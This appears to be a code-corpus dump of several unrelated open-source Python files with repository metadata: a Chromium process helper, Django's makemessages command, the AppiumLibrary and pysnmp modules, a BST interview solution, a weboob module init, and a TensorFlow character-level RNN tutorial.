if cls._processes[key].complete:
return
time.sleep(0.05)
raise TimeoutError()
@classmethod
def Poll(cls, key):
return cls._processes[key].proc.poll()
@classmethod
def GetPid(cls, key):
return cls._processes[key].proc.pid
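# Hedged task-side sketch (an assumption, not from the original file): the
# Set*-before-Start protocol described in the Process class docstring, driven
# directly through the classmethods. The command and cwd are illustrative.
def _example_task_usage():
    key = Process.Process(['echo', 'hello'])
    Process.SetCwd(key, '/tmp')
    Process.SetVerbose(key)
    Process.Start(key)
    Process.Wait(key, timeout=30)
    out, err = Process.ReadOutput(key)
    Process.Delete(key)
    return out, err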
| Teamxrtc/webrtc-streaming-node | third_party/webrtc/src/chromium/src/testing/legion/process.py | Python | mit | 8,760 | 0.010046 |
import fnmatch
import glob
import os
import re
import sys
from functools import total_ordering
from itertools import dropwhile
import django
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.files.temp import NamedTemporaryFile
from django.core.management.base import BaseCommand, CommandError
from django.core.management.utils import (
find_command, handle_extensions, popen_wrapper,
)
from django.utils.encoding import DEFAULT_LOCALE_ENCODING
from django.utils.functional import cached_property
from django.utils.jslex import prepare_js_for_gettext
from django.utils.text import get_text_list
from django.utils.translation import templatize
plural_forms_re = re.compile(r'^(?P<value>"Plural-Forms.+?\\n")\s*$', re.MULTILINE | re.DOTALL)
STATUS_OK = 0
NO_LOCALE_DIR = object()
def check_programs(*programs):
for program in programs:
if find_command(program) is None:
raise CommandError(
"Can't find %s. Make sure you have GNU gettext tools 0.15 or "
"newer installed." % program
)
@total_ordering
class TranslatableFile:
def __init__(self, dirpath, file_name, locale_dir):
self.file = file_name
self.dirpath = dirpath
self.locale_dir = locale_dir
def __repr__(self):
return "<%s: %s>" % (
self.__class__.__name__,
os.sep.join([self.dirpath, self.file]),
)
def __eq__(self, other):
return self.path == other.path
def __lt__(self, other):
return self.path < other.path
@property
def path(self):
return os.path.join(self.dirpath, self.file)
class BuildFile:
"""
Represent the state of a translatable file during the build process.
"""
def __init__(self, command, domain, translatable):
self.command = command
self.domain = domain
self.translatable = translatable
@cached_property
def is_templatized(self):
if self.domain == 'djangojs':
return self.command.gettext_version < (0, 18, 3)
elif self.domain == 'django':
file_ext = os.path.splitext(self.translatable.file)[1]
return file_ext != '.py'
return False
@cached_property
def path(self):
return self.translatable.path
@cached_property
def work_path(self):
"""
Path to a file which is being fed into GNU gettext pipeline. This may
be either a translatable or its preprocessed version.
"""
if not self.is_templatized:
return self.path
extension = {
'djangojs': 'c',
'django': 'py',
}.get(self.domain)
filename = '%s.%s' % (self.translatable.file, extension)
return os.path.join(self.translatable.dirpath, filename)
def preprocess(self):
"""
Preprocess (if necessary) a translatable file before passing it to
xgettext GNU gettext utility.
"""
if not self.is_templatized:
return
encoding = settings.FILE_CHARSET if self.command.settings_available else 'utf-8'
with open(self.path, 'r', encoding=encoding) as fp:
src_data = fp.read()
if self.domain == 'djangojs':
content = prepare_js_for_gettext(src_data)
elif self.domain == 'django':
content = templatize(src_data, origin=self.path[2:])
with open(self.work_path, 'w', encoding='utf-8') as fp:
fp.write(content)
def postprocess_messages(self, msgs):
"""
Postprocess messages generated by xgettext GNU gettext utility.
Transform paths as if these messages were generated from original
translatable files rather than from preprocessed versions.
"""
if not self.is_templatized:
return msgs
# Remove '.py' suffix
if os.name == 'nt':
# Preserve '.\' prefix on Windows to respect gettext behavior
old_path = self.work_path
new_path = self.path
else:
old_path = self.work_path[2:]
new_path = self.path[2:]
return re.sub(
r'^(#: .*)(' + re.escape(old_path) + r')',
lambda match: match.group().replace(old_path, new_path),
msgs,
flags=re.MULTILINE
)
def cleanup(self):
"""
Remove a preprocessed copy of a translatable file (if any).
"""
if self.is_templatized:
# This check is needed for the case of a symlinked file and its
# source being processed inside a single group (locale dir);
# removing either of those two removes both.
if os.path.exists(self.work_path):
os.unlink(self.work_path)
def normalize_eols(raw_contents):
"""
Take a block of raw text that will be passed through str.splitlines() to
get universal newlines treatment.
Return the resulting block of text with normalized `\n` EOL sequences ready
to be written to disk using current platform's native EOLs.
"""
lines_list = raw_contents.splitlines()
# Ensure last line has its EOL
if lines_list and lines_list[-1]:
lines_list.append('')
return '\n'.join(lines_list)
def write_pot_file(potfile, msgs):
"""
Write the `potfile` with the `msgs` contents, making sure its format is
valid.
"""
pot_lines = msgs.splitlines()
if os.path.exists(potfile):
# Strip the header
lines = dropwhile(len, pot_lines)
else:
lines = []
found, header_read = False, False
for line in pot_lines:
if not found and not header_read:
found = True
line = line.replace('charset=CHARSET', 'charset=UTF-8')
if not line and not found:
header_read = True
lines.append(line)
msgs = '\n'.join(lines)
with open(potfile, 'a', encoding='utf-8') as fp:
fp.write(msgs)
class Command(BaseCommand):
help = (
"Runs over the entire source tree of the current directory and "
"pulls out all strings marked for translation. It creates (or updates) a message "
"file in the conf/locale (in the django tree) or locale (for projects and "
"applications) directory.\n\nYou must run this command with one of either the "
"--locale, --exclude, or --all options."
)
translatable_file_class = TranslatableFile
build_file_class = BuildFile
requires_system_checks = False
leave_locale_alone = True
msgmerge_options = ['-q', '--previous']
msguniq_options = ['--to-code=utf-8']
msgattrib_options = ['--no-obsolete']
xgettext_options = ['--from-code=UTF-8', '--add-comments=Translators']
def add_arguments(self, parser):
parser.add_argument(
'--locale', '-l', default=[], dest='locale', action='append',
help='Creates or updates the message files for the given locale(s) (e.g. pt_BR). '
'Can be used multiple times.',
)
parser.add_argument(
'--exclude', '-x', default=[], dest='exclude', action='append',
help='Locales to exclude. Default is none. Can be used multiple times.',
)
parser.add_argument(
'--domain', '-d', default='django', dest='domain',
help='The domain of the message files (default: "django").',
)
parser.add_argument(
'--all', '-a', action='store_true', dest='all',
help='Updates the message files for all existing locales.',
)
parser.add_argument(
'--extension', '-e', dest='extensions', action='append',
help='The file extension(s) to examine (default: "html,txt,py", or "js" '
'if the domain is "djangojs"). Separate multiple extensions with '
'commas, or use -e multiple times.',
)
parser.add_argument(
'--symlinks', '-s', action='store_true', dest='symlinks',
help='Follows symlinks to directories when examining source code '
'and templates for translation strings.',
)
parser.add_argument(
'--ignore', '-i', action='append', dest='ignore_patterns',
default=[], metavar='PATTERN',
help='Ignore files or directories matching this glob-style pattern. '
'Use multiple times to ignore more.',
)
parser.add_argument(
'--no-default-ignore', action='store_false', dest='use_default_ignore_patterns',
help="Don't ignore the common glob-style patterns 'CVS', '.*', '*~' and '*.pyc'.",
)
parser.add_argument(
'--no-wrap', action='store_true', dest='no_wrap',
help="Don't break long message lines into several lines.",
)
parser.add_argument(
'--no-location', action='store_true', dest='no_location',
help="Don't write '#: filename:line' lines.",
)
parser.add_argument(
'--add-location', dest='add_location',
choices=('full', 'file', 'never'), const='full', nargs='?',
help=(
"Controls '#: filename:line' lines. If the option is 'full' "
"(the default if not given), the lines include both file name "
"and line number. If it's 'file', the line number is omitted. If "
"it's 'never', the lines are suppressed (same as --no-location). "
"--add-location requires gettext 0.19 or newer."
),
)
parser.add_argument(
'--no-obsolete', action='store_true', dest='no_obsolete',
help="Remove obsolete message strings.",
)
parser.add_argument(
'--keep-pot', action='store_true', dest='keep_pot',
help="Keep .pot file after making messages. Useful when debugging.",
)
def handle(self, *args, **options):
locale = options['locale']
exclude = options['exclude']
self.domain = options['domain']
self.verbosity = options['verbosity']
process_all = options['all']
extensions = options['extensions']
self.symlinks = options['symlinks']
ignore_patterns = options['ignore_patterns']
if options['use_default_ignore_patterns']:
ignore_patterns += ['CVS', '.*', '*~', '*.pyc']
self.ignore_patterns = list(set(ignore_patterns))
# Avoid messing with mutable class variables
if options['no_wrap']:
self.msgmerge_options = self.msgmerge_options[:] + ['--no-wrap']
self.msguniq_options = self.msguniq_options[:] + ['--no-wrap']
self.msgattrib_options = self.msgattrib_options[:] + ['--no-wrap']
self.xgettext_options = self.xgettext_options[:] + ['--no-wrap']
if options['no_location']:
self.msgmerge_options = self.msgmerge_options[:] + ['--no-location']
self.msguniq_options = self.msguniq_options[:] + ['--no-location']
self.msgattrib_options = self.msgattrib_options[:] + ['--no-location']
self.xgettext_options = self.xgettext_options[:] + ['--no-location']
if options['add_location']:
if self.gettext_version < (0, 19):
raise CommandError(
"The --add-location option requires gettext 0.19 or later. "
"You have %s." % '.'.join(str(x) for x in self.gettext_version)
)
arg_add_location = "--add-location=%s" % options['add_location']
self.msgmerge_options = self.msgmerge_options[:] + [arg_add_location]
self.msguniq_options = self.msguniq_options[:] + [arg_add_location]
self.msgattrib_options = self.msgattrib_options[:] + [arg_add_location]
self.xgettext_options = self.xgettext_options[:] + [arg_add_location]
self.no_obsolete = options['no_obsolete']
self.keep_pot = options['keep_pot']
if self.domain not in ('django', 'djangojs'):
raise CommandError("currently makemessages only supports domains "
"'django' and 'djangojs'")
if self.domain == 'djangojs':
exts = extensions if extensions else ['js']
else:
exts = extensions if extensions else ['html', 'txt', 'py']
self.extensions = handle_extensions(exts)
if (locale is None and not exclude and not process_all) or self.domain is None:
raise CommandError(
"Type '%s help %s' for usage information."
% (os.path.basename(sys.argv[0]), sys.argv[1])
)
if self.verbosity > 1:
self.stdout.write(
'examining files with the extensions: %s\n'
% get_text_list(list(self.extensions), 'and')
)
self.invoked_for_django = False
self.locale_paths = []
self.default_locale_path = None
if os.path.isdir(os.path.join('conf', 'locale')):
self.locale_paths = [os.path.abspath(os.path.join('conf', 'locale'))]
self.default_locale_path = self.locale_paths[0]
self.invoked_for_django = True
else:
if self.settings_available:
self.locale_paths.extend(settings.LOCALE_PATHS)
# Allow to run makemessages inside an app dir
if os.path.isdir('locale'):
self.locale_paths.append(os.path.abspath('locale'))
if self.locale_paths:
self.default_locale_path = self.locale_paths[0]
if not os.path.exists(self.default_locale_path):
os.makedirs(self.default_locale_path)
# Build locale list
looks_like_locale = re.compile(r'[a-z]{2}')
locale_dirs = filter(os.path.isdir, glob.glob('%s/*' % self.default_locale_path))
all_locales = [
lang_code for lang_code in map(os.path.basename, locale_dirs)
if looks_like_locale.match(lang_code)
]
# Account for excluded locales
if process_all:
locales = all_locales
else:
locales = locale or all_locales
locales = set(locales).difference(exclude)
if locales:
check_programs('msguniq', 'msgmerge', 'msgattrib')
check_programs('xgettext')
try:
potfiles = self.build_potfiles()
# Build po files for each selected locale
for locale in locales:
if self.verbosity > 0:
self.stdout.write("processing locale %s\n" % locale)
for potfile in potfiles:
self.write_po_file(potfile, locale)
finally:
if not self.keep_pot:
self.remove_potfiles()
@cached_property
def gettext_version(self):
# Gettext tools will output system-encoded bytestrings instead of UTF-8,
# when looking up the version. It's especially a problem on Windows.
out, err, status = popen_wrapper(
['xgettext', '--version'],
stdout_encoding=DEFAULT_LOCALE_ENCODING,
)
m = re.search(r'(\d+)\.(\d+)\.?(\d+)?', out)
if m:
return tuple(int(d) for d in m.groups() if d is not None)
else:
raise CommandError("Unable to get gettext version. Is it installed?")
@cached_property
def settings_available(self):
try:
settings.LOCALE_PATHS
except ImproperlyConfigured:
if self.verbosity > 1:
self.stderr.write("Running without configured settings.")
return False
return True
def build_potfiles(self):
"""
Build pot files and apply msguniq to them.
"""
file_list = self.find_files(".")
self.remove_potfiles()
self.process_files(file_list)
potfiles = []
for path in self.locale_paths:
potfile = os.path.join(path, '%s.pot' % self.domain)
if not os.path.exists(potfile):
continue
args = ['msguniq'] + self.msguniq_options + [potfile]
msgs, errors, status = popen_wrapper(args)
if errors:
if status != STATUS_OK:
raise CommandError(
"errors happened while running msguniq\n%s" % errors)
elif self.verbosity > 0:
self.stdout.write(errors)
msgs = normalize_eols(msgs)
with open(potfile, 'w', encoding='utf-8') as fp:
fp.write(msgs)
potfiles.append(potfile)
return potfiles
def remove_potfiles(self):
for path in self.locale_paths:
pot_path = os.path.join(path, '%s.pot' % self.domain)
if os.path.exists(pot_path):
os.unlink(pot_path)
def find_files(self, root):
"""
Get all files in the given root. Also check that there is a matching
locale dir for each file.
"""
def is_ignored(path, ignore_patterns):
"""
Check if the given path should be ignored or not.
"""
filename = os.path.basename(path)
def ignore(pattern):
return fnmatch.fnmatchcase(filename, pattern) or fnmatch.fnmatchcase(path, pattern)
return any(ignore(pattern) for pattern in ignore_patterns)
ignore_patterns = [os.path.normcase(p) for p in self.ignore_patterns]
dir_suffixes = {'%s*' % path_sep for path_sep in {'/', os.sep}}
norm_patterns = []
for p in ignore_patterns:
for dir_suffix in dir_suffixes:
if p.endswith(dir_suffix):
norm_patterns.append(p[:-len(dir_suffix)])
break
else:
norm_patterns.append(p)
all_files = []
ignored_roots = []
if self.settings_available:
ignored_roots = [os.path.normpath(p) for p in (settings.MEDIA_ROOT, settings.STATIC_ROOT) if p]
for dirpath, dirnames, filenames in os.walk(root, topdown=True, followlinks=self.symlinks):
for dirname in dirnames[:]:
if (is_ignored(os.path.normpath(os.path.join(dirpath, dirname)), norm_patterns) or
os.path.join(os.path.abspath(dirpath), dirname) in ignored_roots):
dirnames.remove(dirname)
if self.verbosity > 1:
self.stdout.write('ignoring directory %s\n' % dirname)
elif dirname == 'locale':
dirnames.remove(dirname)
self.locale_paths.insert(0, os.path.join(os.path.abspath(dirpath), dirname))
for filename in filenames:
file_path = os.path.normpath(os.path.join(dirpath, filename))
file_ext = os.path.splitext(filename)[1]
if file_ext not in self.extensions or is_ignored(file_path, self.ignore_patterns):
if self.verbosity > 1:
self.stdout.write('ignoring file %s in %s\n' % (filename, dirpath))
else:
locale_dir = None
for path in self.locale_paths:
if os.path.abspath(dirpath).startswith(os.path.dirname(path)):
locale_dir = path
break
if not locale_dir:
locale_dir = self.default_locale_path
if not locale_dir:
locale_dir = NO_LOCALE_DIR
all_files.append(self.translatable_file_class(dirpath, filename, locale_dir))
return sorted(all_files)
def process_files(self, file_list):
"""
Group translatable files by locale directory and run pot file build
process for each group.
"""
file_groups = {}
for translatable in file_list:
file_group = file_groups.setdefault(translatable.locale_dir, [])
file_group.append(translatable)
for locale_dir, files in file_groups.items():
self.process_locale_dir(locale_dir, files)
def process_locale_dir(self, locale_dir, files):
"""
Extract translatable literals from the specified files, creating or
updating the POT file for a given locale directory.
Use the xgettext GNU gettext utility.
"""
build_files = []
for translatable in files:
if self.verbosity > 1:
self.stdout.write('processing file %s in %s\n' % (
translatable.file, translatable.dirpath
))
if self.domain not in ('djangojs', 'django'):
continue
build_file = self.build_file_class(self, self.domain, translatable)
try:
build_file.preprocess()
except UnicodeDecodeError as e:
self.stdout.write(
'UnicodeDecodeError: skipped file %s in %s (reason: %s)' % (
translatable.file, translatable.dirpath, e,
)
)
continue
build_files.append(build_file)
if self.domain == 'djangojs':
is_templatized = build_file.is_templatized
args = [
'xgettext',
'-d', self.domain,
'--language=%s' % ('C' if is_templatized else 'JavaScript',),
'--keyword=gettext_noop',
'--keyword=gettext_lazy',
'--keyword=ngettext_lazy:1,2',
'--keyword=pgettext:1c,2',
'--keyword=npgettext:1c,2,3',
'--output=-',
]
elif self.domain == 'django':
args = [
'xgettext',
'-d', self.domain,
'--language=Python',
'--keyword=gettext_noop',
'--keyword=gettext_lazy',
'--keyword=ngettext_lazy:1,2',
'--keyword=ugettext_noop',
'--keyword=ugettext_lazy',
'--keyword=ungettext_lazy:1,2',
'--keyword=pgettext:1c,2',
'--keyword=npgettext:1c,2,3',
'--keyword=pgettext_lazy:1c,2',
'--keyword=npgettext_lazy:1c,2,3',
'--output=-',
]
else:
return
input_files = [bf.work_path for bf in build_files]
with NamedTemporaryFile(mode='w+') as input_files_list:
input_files_list.write(('\n'.join(input_files)))
input_files_list.flush()
args.extend(['--files-from', input_files_list.name])
args.extend(self.xgettext_options)
msgs, errors, status = popen_wrapper(args)
if errors:
if status != STATUS_OK:
for build_file in build_files:
build_file.cleanup()
raise CommandError(
'errors happened while running xgettext on %s\n%s' %
('\n'.join(input_files), errors)
)
elif self.verbosity > 0:
# Print warnings
self.stdout.write(errors)
if msgs:
if locale_dir is NO_LOCALE_DIR:
file_path = os.path.normpath(build_files[0].path)
raise CommandError(
'Unable to find a locale path to store translations for '
'file %s' % file_path
)
for build_file in build_files:
msgs = build_file.postprocess_messages(msgs)
potfile = os.path.join(locale_dir, '%s.pot' % self.domain)
write_pot_file(potfile, msgs)
for build_file in build_files:
build_file.cleanup()
def write_po_file(self, potfile, locale):
"""
Create or update the PO file for self.domain and `locale`.
Use contents of the existing `potfile`.
Use msgmerge and msgattrib GNU gettext utilities.
"""
basedir = os.path.join(os.path.dirname(potfile), locale, 'LC_MESSAGES')
if not os.path.isdir(basedir):
os.makedirs(basedir)
pofile = os.path.join(basedir, '%s.po' % self.domain)
if os.path.exists(pofile):
args = ['msgmerge'] + self.msgmerge_options + [pofile, potfile]
msgs, errors, status = popen_wrapper(args)
if errors:
if status != STATUS_OK:
raise CommandError(
"errors happened while running msgmerge\n%s" % errors)
elif self.verbosity > 0:
self.stdout.write(errors)
else:
with open(potfile, 'r', encoding='utf-8') as fp:
msgs = fp.read()
if not self.invoked_for_django:
msgs = self.copy_plural_forms(msgs, locale)
msgs = normalize_eols(msgs)
msgs = msgs.replace(
"#. #-#-#-#-# %s.pot (PACKAGE VERSION) #-#-#-#-#\n" % self.domain, "")
with open(pofile, 'w', encoding='utf-8') as fp:
fp.write(msgs)
if self.no_obsolete:
args = ['msgattrib'] + self.msgattrib_options + ['-o', pofile, pofile]
msgs, errors, status = popen_wrapper(args)
if errors:
if status != STATUS_OK:
raise CommandError(
"errors happened while running msgattrib\n%s" % errors)
elif self.verbosity > 0:
self.stdout.write(errors)
def copy_plural_forms(self, msgs, locale):
"""
Copy plural forms header contents from a Django catalog of locale to
the msgs string, inserting it at the right place. msgs should be the
contents of a newly created .po file.
"""
django_dir = os.path.normpath(os.path.join(os.path.dirname(django.__file__)))
if self.domain == 'djangojs':
domains = ('djangojs', 'django')
else:
domains = ('django',)
for domain in domains:
django_po = os.path.join(django_dir, 'conf', 'locale', locale, 'LC_MESSAGES', '%s.po' % domain)
if os.path.exists(django_po):
with open(django_po, 'r', encoding='utf-8') as fp:
m = plural_forms_re.search(fp.read())
if m:
plural_form_line = m.group('value')
if self.verbosity > 1:
self.stdout.write("copying plural forms: %s\n" % plural_form_line)
lines = []
found = False
for line in msgs.splitlines():
if not found and (not line or plural_forms_re.search(line)):
line = plural_form_line
found = True
lines.append(line)
msgs = '\n'.join(lines)
break
return msgs
| edmorley/django | django/core/management/commands/makemessages.py | Python | bsd-3-clause | 27,345 | 0.001682 |
# -*- coding: utf-8 -*-
import os
from AppiumLibrary.keywords import *
from AppiumLibrary.version import VERSION
__version__ = VERSION
class AppiumLibrary(
_LoggingKeywords,
_RunOnFailureKeywords,
_ElementKeywords,
_ScreenshotKeywords,
_ApplicationManagementKeywords,
_WaitingKeywords,
_TouchKeywords,
_KeyeventKeywords,
_AndroidUtilsKeywords,
_ScreenrecordKeywords
):
"""AppiumLibrary is a Mobile App testing library for Robot Framework.
= Locating or specifying elements =
All keywords in AppiumLibrary that need to find an element on the page
take an argument, either a ``locator`` or a ``webelement``. ``locator``
is a string that describes how to locate an element using a syntax
specifying different location strategies. ``webelement`` is a variable that
holds a WebElement instance, which is a representation of the element.
== Using locators ==
By default, when a locator is provided, it is matched against the key attributes
of the particular element type. For iOS and Android, key attribute is ``id`` for
all elements and locating elements is easy using just the ``id``. For example:
| Click Element id=my_element
New in AppiumLibrary 1.4, the ``id`` and ``xpath`` prefixes are no longer required;
however, a prefix-less XPath locator must start with ``//``, otherwise use the explicit ``xpath=`` prefix as explained below.
For example:
| Click Element my_element
| Wait Until Page Contains Element //*[@type="android.widget.EditText"]
Appium additionally supports some of the [https://w3c.github.io/webdriver/webdriver-spec.html|Mobile JSON Wire Protocol] locator strategies.
It is also possible to specify the approach AppiumLibrary should take
to find an element by specifying a lookup strategy with a locator
prefix. Supported strategies are:
| *Strategy* | *Example* | *Description* | *Note* |
| identifier | Click Element `|` identifier=my_element | Matches by @id attribute | |
| id | Click Element `|` id=my_element | Matches by @resource-id attribute | |
| accessibility_id | Click Element `|` accessibility_id=button3 | Matches by accessibility id | |
| xpath | Click Element `|` xpath=//UIATableView/UIATableCell/UIAButton | Matches with arbitrary XPath | |
| class | Click Element `|` class=UIAPickerWheel | Matches by class | |
| android | Click Element `|` android=UiSelector().description('Apps') | Matches by Android UI Automator | |
| ios | Click Element `|` ios=.buttons().withName('Apps') | Matches by iOS UI Automation | |
| nsp | Click Element `|` nsp=name=="login" | Matches by iOSNsPredicate | Check PR: #196 |
| chain | Click Element `|` chain=XCUIElementTypeWindow[1]/* | Matches by iOS Class Chain | |
| css | Click Element `|` css=.green_button | Matches by css in webview | |
| name | Click Element `|` name=my_element | Matches by @name attribute | *Only valid* for Selendroid |
== Using webelements ==
Starting with version 1.4 of the AppiumLibrary, one can pass an argument
that contains a WebElement instead of a string locator. To get a WebElement,
use the new `Get WebElements` or `Get WebElement` keyword.
For example:
| @{elements} Get Webelements class=UIAButton
| Click Element @{elements}[2]
"""
ROBOT_LIBRARY_SCOPE = 'GLOBAL'
ROBOT_LIBRARY_VERSION = VERSION
def __init__(self, timeout=5, run_on_failure='Capture Page Screenshot'):
"""AppiumLibrary can be imported with optional arguments.
``timeout`` is the default timeout used to wait for all waiting actions.
It can be later set with `Set Appium Timeout`.
``run_on_failure`` specifies the name of a keyword (from any available
libraries) to execute when a AppiumLibrary keyword fails.
By default `Capture Page Screenshot` will be used to take a screenshot of the current page.
Using the value `No Operation` will disable this feature altogether. See
`Register Keyword To Run On Failure` keyword for more information about this
functionality.
Examples:
| Library | AppiumLibrary | 10 | # Sets default timeout to 10 seconds |
| Library | AppiumLibrary | timeout=10 | run_on_failure=No Operation | # Sets default timeout to 10 seconds and does nothing on failure |
"""
for base in AppiumLibrary.__bases__:
base.__init__(self)
self.set_appium_timeout(timeout)
self.register_keyword_to_run_on_failure(run_on_failure)
|
jollychang/robotframework-appiumlibrary
|
AppiumLibrary/__init__.py
|
Python
|
apache-2.0
| 5,544
| 0.004509
|
#
# This file is part of pysnmp software.
#
# Copyright (c) 2005-2019, Ilya Etingof <etingof@gmail.com>
# License: http://snmplabs.com/pysnmp/license.html
#
from pysnmp import error
class MetaObserver(object):
"""This is a simple facility for exposing internal SNMP Engine
working details to pysnmp applications. These details are
basically local scope variables at a fixed point of execution.
    Two modes of operation are offered:
    1. Consumer: an application can request an execution point context by execution point ID.
    2. Provider: an application can register a callback function (and context) to be invoked
       once execution reaches the specified point. All local scope variables
       will be passed to the callback as in #1.
    It is important to realize that an execution context is only guaranteed
    to exist for functions that are at the same or a deeper level of invocation
    relative to the specified execution point.
"""
def __init__(self):
self.__observers = {}
self.__contexts = {}
self.__execpoints = {}
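    # A minimal provider-mode sketch (illustrative only; the callback signature
    # matches what storeExecutionContext() passes below, and the execution point
    # name is just an example string):
    #
    #   observer = MetaObserver()
    #
    #   def cbFun(snmpEngine, execpoint, variables, cbCtx):
    #       print('reached %s with %r' % (execpoint, variables))
    #
    #   observer.registerObserver(cbFun, 'rfc3412.receiveMessage:request')
    #   # later, the SNMP engine calls storeExecutionContext() at that point,
    #   # which invokes cbFun with the local variables of that scope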
def registerObserver(self, cbFun, *execpoints, **kwargs):
if cbFun in self.__contexts:
raise error.PySnmpError('duplicate observer %s' % cbFun)
else:
self.__contexts[cbFun] = kwargs.get('cbCtx')
for execpoint in execpoints:
if execpoint not in self.__observers:
self.__observers[execpoint] = []
self.__observers[execpoint].append(cbFun)
def unregisterObserver(self, cbFun=None):
if cbFun is None:
self.__observers.clear()
self.__contexts.clear()
else:
for execpoint in dict(self.__observers):
if cbFun in self.__observers[execpoint]:
self.__observers[execpoint].remove(cbFun)
if not self.__observers[execpoint]:
del self.__observers[execpoint]
def storeExecutionContext(self, snmpEngine, execpoint, variables):
self.__execpoints[execpoint] = variables
if execpoint in self.__observers:
for cbFun in self.__observers[execpoint]:
cbFun(snmpEngine, execpoint, variables, self.__contexts[cbFun])
def clearExecutionContext(self, snmpEngine, *execpoints):
if execpoints:
for execpoint in execpoints:
del self.__execpoints[execpoint]
else:
self.__execpoints.clear()
def getExecutionContext(self, execpoint):
return self.__execpoints[execpoint]
|
etingof/pysnmp
|
pysnmp/entity/observer.py
|
Python
|
bsd-2-clause
| 2,572
| 0.000778
|
'''
Problem:
Find the kth smallest element in a bst without using static/global variables.
'''
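# Approach (derived from the code below): an in-order traversal that threads a
# running count through the recursion (the items/index values) instead of a
# global counter; the kth smallest value is found once that count reaches k.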
def find(node, k, items=0):
# Base case.
if not node:
return items, None
# Decode the node.
left, value, right = node
# Check left.
index, result = find(left, k, items)
# Exit early.
if result:
return index, result
# Check this node.
next = index + 1
if next == k:
return next, value
# Check the right.
return find(right, k, next)
test = (((None, 1, None), 2, (None, 3, None)), 4, ((None, 5, None), 5, (None, 6, None)))
#test = ((None, 1, None), 2, (None, 3, None))
print(find(test, 11))
|
RishiRamraj/interviews
|
solutions/algorithms/bst.py
|
Python
|
mit
| 667
| 0.004498
|
# -*- coding: utf-8 -*-
# Copyright(C) 2017 Juliette Fourcot
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from .module import EnsapModule
__all__ = ['EnsapModule']
|
laurentb/weboob
|
modules/ensap/__init__.py
|
Python
|
lgpl-3.0
| 885
| 0
|
# coding: utf-8
# # Simple Character-level Language Model using vanilla RNN
# 2017-04-21 jkang
# Python3.5
# TensorFlow1.0.1
#
# - Different window sizes were applied, e.g. n_window = 3 (three-character window)
# - input: 'hello_world_good_morning_see_you_hello_grea'
# - output: 'ello_world_good_morning_see_you_hello_great'
#
# ### Reference:
# - https://github.com/tensorflow/tensorflow/blob/master/tensorflow/contrib/rnn/python/ops/core_rnn_cell_impl.py
# - https://github.com/aymericdamien/TensorFlow-Examples
# - https://hunkim.github.io/ml/
#
# ### Comment:
# - Training is done at the character level, not the word level
# - Only a single example is used for training
#   : that one example is windowed to generate multiple samples (each new sample has length window_size)
# - The cell type is BasicRNNCell (see the first reference)
# - dynamic_rnn is used (said to be more time/compute efficient than the legacy tf.nn.rnn)
# - AdamOptimizer is used
# In[1]:
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import random
# Input/Output data
char_raw = 'hello_world_good_morning_see_you_hello_great'
char_list = sorted(list(set(char_raw)))
char_to_idx = {c: i for i, c in enumerate(char_list)}
idx_to_char = {i: c for i, c in enumerate(char_list)}
char_data = [char_to_idx[c] for c in char_raw]
char_data_one_hot = tf.one_hot(char_data, depth=len(
char_list), on_value=1., off_value=0., axis=1, dtype=tf.float32)
char_input = char_data_one_hot[:-1, :] # 'hello_world_good_morning_see_you_hello_grea'
char_output = char_data_one_hot[1:, :] # 'ello_world_good_morning_see_you_hello_great'
with tf.Session() as sess:
char_input = char_input.eval()
char_output = char_output.eval()
# In[2]:
# Learning parameters
learning_rate = 0.001
max_iter = 1000
# Network Parameters
n_input_dim = char_input.shape[1]
n_input_len = char_input.shape[0]
n_output_dim = char_output.shape[1]
n_output_len = char_output.shape[0]
n_hidden = 100
n_window = 2 # number of characters in one window (like a mini-batch)
# TensorFlow graph
# (batch_size) x (time_step) x (input_dimension)
x_data = tf.placeholder(tf.float32, [None, None, n_input_dim])
# (batch_size) x (time_step) x (output_dimension)
y_data = tf.placeholder(tf.float32, [None, None, n_output_dim])
# Parameters
weights = {
'out': tf.Variable(tf.truncated_normal([n_hidden, n_output_dim]))
}
biases = {
'out': tf.Variable(tf.truncated_normal([n_output_dim]))
}
# In[3]:
def make_window_batch(x, y, window_size):
'''
This function will generate samples based on window_size from (x, y)
    Although (x, y) is a single example, this will create multiple examples, each of length window_size
x: (time_step) x (input_dim)
y: (time_step) x (output_dim)
x_out: (total_batch) x (batch_size) x (window_size) x (input_dim)
y_out: (total_batch) x (batch_size) x (window_size) x (output_dim)
total_batch x batch_size <= examples
'''
# (batch_size) x (window_size) x (dim)
# n_examples is calculated by sliding one character with window_size
n_examples = x.shape[0] - window_size + 1 # n_examples = batch_size
x_batch = np.empty((n_examples, window_size, x.shape[1]))
y_batch = np.empty((n_examples, window_size, y.shape[1]))
for i in range(n_examples):
x_batch[i, :, :] = x[i:i + window_size, :]
y_batch[i, :, :] = y[i:i + window_size, :]
z = list(zip(x_batch, y_batch))
random.shuffle(z)
x_batch, y_batch = zip(*z)
x_batch = np.array(x_batch)
y_batch = np.array(y_batch)
# (total_batch) x (batch_size) x (window_size) x (dim)
# total_batch is set to 1 (no mini-batch)
x_new = x_batch.reshape((n_examples, window_size, x_batch.shape[2]))
y_new = y_batch.reshape((n_examples, window_size, y_batch.shape[2]))
return x_new, y_new, n_examples
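# Illustrative shapes for this script's data: char_input has 43 rows (the
# 44-character string minus one), so make_window_batch(char_input, char_output, 2)
# returns 42 shuffled windows, each of shape (2, number_of_distinct_characters),
# for both x and y.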
# In[4]:
def RNN(x, weights, biases):
cell = tf.contrib.rnn.BasicRNNCell(n_hidden) # Make RNNCell
outputs, states = tf.nn.dynamic_rnn(cell, x, time_major=False, dtype=tf.float32)
'''
**Notes on tf.nn.dynamic_rnn**
- 'x' can have shape (batch)x(time)x(input_dim), if time_major=False or
(time)x(batch)x(input_dim), if time_major=True
    - 'outputs' has the same batch/time layout as 'x' but with hidden_dim as the last axis:
      (batch)x(time)x(hidden_dim), if time_major=False or
      (time)x(batch)x(hidden_dim), if time_major=True
- 'states' is the final state, determined by batch and hidden_dim
'''
# outputs[-1] is outputs for the last example in the mini-batch
